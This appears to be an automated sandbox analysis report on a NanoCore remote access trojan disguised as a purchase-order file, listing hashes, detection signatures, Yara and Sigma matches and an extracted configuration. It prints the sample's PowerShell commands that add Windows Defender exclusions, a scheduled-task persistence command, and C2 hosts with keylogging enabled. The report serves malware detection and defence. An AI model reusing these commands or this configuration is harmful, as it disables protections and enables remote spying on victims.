Windows Analysis Report #RFQ ORDER7678432213211.exe

Overview

General Information

Sample Name: #RFQ ORDER7678432213211.exe
Analysis ID: 451085
MD5: 2f286cd817b368e8a747e8f0d8f28825
SHA1: e49beec02d942e12b0dad74d81ab8ed4f02667e2
SHA256: b291d719522053a662cadd70b131668a1d953d4c4dd648e8a5647b689eb6341d
Tags: exe, NanoCore, RAT

Detection

Nanocore
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected Nanocore Rat
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: NanoCore
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Nanocore RAT
Adds a directory exclusion to Windows Defender
C2 URLs / IPs found in malware configuration
Hides that the sample has been downloaded from the Internet (zone.identifier)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Powershell Defender Exclusion
Uses schtasks.exe or at.exe to add and modify task schedules
Antivirus or Machine Learning detection for unpacked file
Binary contains a suspicious time stamp
Contains capabilities to detect virtual machines
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Installs a raw input device (often for capturing keystrokes)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Process Tree

  • System is w10x64
  • #RFQ ORDER7678432213211.exe (PID: 4900 cmdline: 'C:\Users\user\Desktop\#RFQ ORDER7678432213211.exe' MD5: 2F286CD817B368E8A747E8F0D8F28825)
    • powershell.exe (PID: 6052 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\#RFQ ORDER7678432213211.exe' MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 1532 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 2416 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\XgPYsUfalKn.exe' MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 1844 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • schtasks.exe (PID: 3348 cmdline: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\XgPYsUfalKn' /XML 'C:\Users\user\AppData\Local\Temp\tmpFD92.tmp' MD5: 15FF7D8324231381BAD48A052F85DF04)
      • conhost.exe (PID: 6080 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 1848 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\XgPYsUfalKn.exe' MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 1260 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • #RFQ ORDER7678432213211.exe (PID: 1328 cmdline: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exe MD5: 2F286CD817B368E8A747E8F0D8F28825)
  • cleanup

Malware Configuration

Threatname: NanoCore

{"Version": "1.2.2.0", "Mutex": "6f656d69-7475-8807-1300-000c0a4c", "Group": "oluwa", "Domain1": "194.5.98.120", "Domain2": "joseedward5001.ddns.net", "Port": 1604, "KeyboardLogging": "Enable", "RunOnStartup": "Disable", "RequestElevation": "Disable", "BypassUAC": "Disable", "ClearZoneIdentifier": "Enable", "ClearAccessControl": "Disable", "SetCriticalProcess": "Disable", "PreventSystemSleep": "Enable", "ActivateAwayMode": "Disable", "EnableDebugMode": "Disable", "RunDelay": 0, "ConnectDelay": 4000, "RestartDelay": 5000, "TimeoutInterval": 5000, "KeepAliveTimeout": 30000, "MutexTimeout": 5000, "LanTimeout": 2500, "WanTimeout": 8000, "BufferSize": "ffff0000", "MaxPacketSize": "0000a000", "GCThreshold": "0000a000", "UseCustomDNS": "Enable", "PrimaryDNSServer": "8.8.8.8", "BackupDNSServer": "8.8.4.4"}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000012.00000002.493425460.0000000005840000.00000004.00000001.sdmp | Nanocore_RAT_Gen_2 | Detetcs the Nanocore RAT | Florian Roth
  • 0x1f1db:$x1: NanoCore.ClientPluginHost
  • 0x1f1f5:$x2: IClientNetworkHost
00000012.00000002.493425460.0000000005840000.00000004.00000001.sdmp | Nanocore_RAT_Feb18_1 | Detects Nanocore RAT | Florian Roth
  • 0x1f1db:$x2: NanoCore.ClientPluginHost
  • 0x22518:$s4: PipeCreated
  • 0x1f1c8:$s5: IClientLoggingHost
00000012.00000002.493258723.00000000057F0000.00000004.00000001.sdmp | Nanocore_RAT_Gen_2 | Detetcs the Nanocore RAT | Florian Roth
  • 0x59eb:$x1: NanoCore.ClientPluginHost
  • 0x5b48:$x2: IClientNetworkHost
00000012.00000002.493258723.00000000057F0000.00000004.00000001.sdmp | Nanocore_RAT_Feb18_1 | Detects Nanocore RAT | Florian Roth
  • 0x59eb:$x2: NanoCore.ClientPluginHost
  • 0x6941:$s3: PipeExists
  • 0x5be1:$s4: PipeCreated
  • 0x5a05:$s5: IClientLoggingHost
00000012.00000002.493293452.0000000005800000.00000004.00000001.sdmp | Nanocore_RAT_Gen_2 | Detetcs the Nanocore RAT | Florian Roth
  • 0x39eb:$x1: NanoCore.ClientPluginHost
  • 0x3a24:$x2: IClientNetworkHost

Unpacked PEs

Source | Rule | Description | Author | Strings
18.2.#RFQ ORDER7678432213211.exe.6310000.19.unpack | Nanocore_RAT_Gen_2 | Detetcs the Nanocore RAT | Florian Roth
  • 0x41ee:$x1: NanoCore.ClientPluginHost
  • 0x422b:$x2: IClientNetworkHost
18.2.#RFQ ORDER7678432213211.exe.6310000.19.unpack | Nanocore_RAT_Feb18_1 | Detects Nanocore RAT | Florian Roth
  • 0x41ee:$x2: NanoCore.ClientPluginHost
  • 0x7641:$s4: PipeCreated
  • 0x4218:$s5: IClientLoggingHost
18.2.#RFQ ORDER7678432213211.exe.57f0000.8.unpack | Nanocore_RAT_Gen_2 | Detetcs the Nanocore RAT | Florian Roth
  • 0x3deb:$x1: NanoCore.ClientPluginHost
  • 0x3f48:$x2: IClientNetworkHost
18.2.#RFQ ORDER7678432213211.exe.57f0000.8.unpack | Nanocore_RAT_Feb18_1 | Detects Nanocore RAT | Florian Roth
  • 0x3deb:$x2: NanoCore.ClientPluginHost
  • 0x4d41:$s3: PipeExists
  • 0x3fe1:$s4: PipeCreated
  • 0x3e05:$s5: IClientLoggingHost
18.2.#RFQ ORDER7678432213211.exe.5830000.11.raw.unpack | Nanocore_RAT_Gen_2 | Detetcs the Nanocore RAT | Florian Roth
  • 0x350b:$x1: NanoCore.ClientPluginHost
  • 0x3525:$x2: IClientNetworkHost

Sigma Overview

AV Detection:

Sigma detected: NanoCore
Source: File created, Author: Joe Security, Data: EventID: 11, Image: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exe, ProcessId: 1328, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

E-Banking Fraud:

Sigma detected: NanoCore
Source: File created, Author: Joe Security, Data: EventID: 11, Image: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exe, ProcessId: 1328, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

System Summary:

Sigma detected: Powershell Defender Exclusion
Source: Process started, Author: Florian Roth, Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\#RFQ ORDER7678432213211.exe', CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\#RFQ ORDER7678432213211.exe', CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Users\user\Desktop\#RFQ ORDER7678432213211.exe' , ParentImage: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exe, ParentProcessId: 4900, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\#RFQ ORDER7678432213211.exe', ProcessId: 6052
Sigma detected: Non Interactive PowerShell
Source: Process started, Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements), Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\#RFQ ORDER7678432213211.exe', CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\#RFQ ORDER7678432213211.exe', CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Users\user\Desktop\#RFQ ORDER7678432213211.exe' , ParentImage: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exe, ParentProcessId: 4900, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\#RFQ ORDER7678432213211.exe', ProcessId: 6052

Stealing of Sensitive Information:

Sigma detected: NanoCore
Source: File created, Author: Joe Security, Data: EventID: 11, Image: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exe, ProcessId: 1328, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

Remote Access Functionality:

Sigma detected: NanoCore
Source: File created, Author: Joe Security, Data: EventID: 11, Image: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exe, ProcessId: 1328, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

Jbx Signature Overview

AV Detection:

Found malware configuration
Source: 00000012.00000002.490625846.0000000004081000.00000004.00000001.sdmp, Malware Configuration Extractor: NanoCore {"Version": "1.2.2.0", "Mutex": "6f656d69-7475-8807-1300-000c0a4c", "Group": "oluwa", "Domain1": "194.5.98.120", "Domain2": "joseedward5001.ddns.net", "Port": 1604, "KeyboardLogging": "Enable", "RunOnStartup": "Disable", "RequestElevation": "Disable", "BypassUAC": "Disable", "ClearZoneIdentifier": "Enable", "ClearAccessControl": "Disable", "SetCriticalProcess": "Disable", "PreventSystemSleep": "Enable", "ActivateAwayMode": "Disable", "EnableDebugMode": "Disable", "RunDelay": 0, "ConnectDelay": 4000, "RestartDelay": 5000, "TimeoutInterval": 5000, "KeepAliveTimeout": 30000, "MutexTimeout": 5000, "LanTimeout": 2500, "WanTimeout": 8000, "BufferSize": "ffff0000", "MaxPacketSize": "0000a000", "GCThreshold": "0000a000", "UseCustomDNS": "Enable", "PrimaryDNSServer": "8.8.8.8", "BackupDNSServer": "8.8.4.4"}
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Roaming\XgPYsUfalKn.exe, ReversingLabs: Detection: 13%
Multi AV Scanner detection for submitted file
Source: #RFQ ORDER7678432213211.exe, ReversingLabs: Detection: 13%
Yara detected Nanocore RAT
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Roaming\XgPYsUfalKn.exe, Joe Sandbox ML: detected
Machine Learning detection for sample
Source: #RFQ ORDER7678432213211.exe, Joe Sandbox ML: detected
Source: 18.2.#RFQ ORDER7678432213211.exe.5940000.17.unpack, Avira: Label: TR/NanoCore.fadte
Source: 18.2.#RFQ ORDER7678432213211.exe.400000.0.unpack, Avira: Label: TR/Dropper.MSIL.Gen7
Source: #RFQ ORDER7678432213211.exe, Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: #RFQ ORDER7678432213211.exe, Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: mscorlib.pdb source: #RFQ ORDER7678432213211.exe, 00000012.00000002.483167361.000000000124C000.00000004.00000020.sdmp
Source: Binary string: System.pdb source: #RFQ ORDER7678432213211.exe, 00000012.00000002.483005071.0000000001217000.00000004.00000020.sdmp
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exe, Code function: 4x nop then lea esp, dword ptr [ebp-04h], 18_2_0658AEB0
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exe, Code function: 4x nop then lea esp, dword ptr [ebp-04h], 18_2_0658AEA1

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic, Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.3:49726 -> 194.5.98.120:1604
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor, URLs: 194.5.98.120
Source: Malware configuration extractor, URLs: joseedward5001.ddns.net
Source: global traffic, TCP traffic: 192.168.2.3:49726 -> 194.5.98.120:1604
Source: Joe Sandbox View, ASN Name: DANILENKODE DANILENKODE
Source: unknown, TCP traffic detected without corresponding DNS query: 194.5.98.120
Source: #RFQ ORDER7678432213211.exe, 00000012.00000002.490625846.0000000004081000.00000004.00000001.sdmp, Binary or memory string: RegisterRawInputDevices

E-Banking Fraud:

Yara detected Nanocore RAT

System Summary:

Malicious sample detected (through community Yara rule)
Initial sample is a PE file and has a suspicious name
Source: initial sampleStatic PE information: Filename: #RFQ ORDER7678432213211.exe
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeCode function: 18_2_00A531B818_2_00A531B8
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeCode function: 18_2_00A52ADF18_2_00A52ADF
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeCode function: 18_2_0145E47118_2_0145E471
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeCode function: 18_2_0145E48018_2_0145E480
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeCode function: 18_2_0145BBD418_2_0145BBD4
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeCode function: 18_2_0658803018_2_06588030
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeCode function: 18_2_06588C4818_2_06588C48
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeCode function: 18_2_06588D0618_2_06588D06
Source: #RFQ ORDER7678432213211.exe, 00000000.00000000.212779401.00000000002AC000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameSafeTypeNameParserHand.exeB vs #RFQ ORDER7678432213211.exe
Source: #RFQ ORDER7678432213211.exe, 00000012.00000002.485095538.0000000003078000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameClientPlugin.dll4 vs #RFQ ORDER7678432213211.exe
Source: #RFQ ORDER7678432213211.exe, 00000012.00000002.479636748.0000000000B5C000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameSafeTypeNameParserHand.exeB vs #RFQ ORDER7678432213211.exe
Source: #RFQ ORDER7678432213211.exe, 00000012.00000002.494090628.0000000006310000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameToolsClientPlugin.dll4 vs #RFQ ORDER7678432213211.exe
Source: #RFQ ORDER7678432213211.exe, 00000012.00000002.493987708.00000000061E0000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameLzma#.dll4 vs #RFQ ORDER7678432213211.exe
Source: #RFQ ORDER7678432213211.exe, 00000012.00000002.490625846.0000000004081000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameSurveillanceExClientPlugin.dll4 vs #RFQ ORDER7678432213211.exe
Source: #RFQ ORDER7678432213211.exe, 00000012.00000002.495135748.00000000070B0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameKernelbase.dll.muij% vs #RFQ ORDER7678432213211.exe
Source: #RFQ ORDER7678432213211.exeBinary or memory string: OriginalFilenameSafeTypeNameParserHand.exeB vs #RFQ ORDER7678432213211.exe
Source: #RFQ ORDER7678432213211.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: 18.2.#RFQ ORDER7678432213211.exe.6310000.19.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 18.2.#RFQ ORDER7678432213211.exe.6310000.19.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 18.2.#RFQ ORDER7678432213211.exe.57f0000.8.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 18.2.#RFQ ORDER7678432213211.exe.57f0000.8.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 18.2.#RFQ ORDER7678432213211.exe.5830000.11.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 18.2.#RFQ ORDER7678432213211.exe.5830000.11.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 18.2.#RFQ ORDER7678432213211.exe.4088a48.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 18.2.#RFQ ORDER7678432213211.exe.4088a48.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 18.2.#RFQ ORDER7678432213211.exe.6310000.19.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 18.2.#RFQ ORDER7678432213211.exe.6310000.19.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 18.2.#RFQ ORDER7678432213211.exe.57e0000.7.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 18.2.#RFQ ORDER7678432213211.exe.57e0000.7.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 18.2.#RFQ ORDER7678432213211.exe.5940000.17.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 18.2.#RFQ ORDER7678432213211.exe.5940000.17.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 18.2.#RFQ ORDER7678432213211.exe.5810000.10.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 18.2.#RFQ ORDER7678432213211.exe.5810000.10.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 18.2.#RFQ ORDER7678432213211.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 18.2.#RFQ ORDER7678432213211.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 18.2.#RFQ ORDER7678432213211.exe.584e8a4.13.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 18.2.#RFQ ORDER7678432213211.exe.584e8a4.13.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 18.2.#RFQ ORDER7678432213211.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 18.2.#RFQ ORDER7678432213211.exe.5944629.16.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 18.2.#RFQ ORDER7678432213211.exe.5944629.16.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 18.2.#RFQ ORDER7678432213211.exe.5840000.12.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 18.2.#RFQ ORDER7678432213211.exe.5840000.12.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 18.2.#RFQ ORDER7678432213211.exe.5800000.9.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 18.2.#RFQ ORDER7678432213211.exe.5800000.9.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 18.2.#RFQ ORDER7678432213211.exe.5940000.17.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 18.2.#RFQ ORDER7678432213211.exe.5940000.17.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 18.2.#RFQ ORDER7678432213211.exe.5830000.11.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 18.2.#RFQ ORDER7678432213211.exe.5830000.11.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
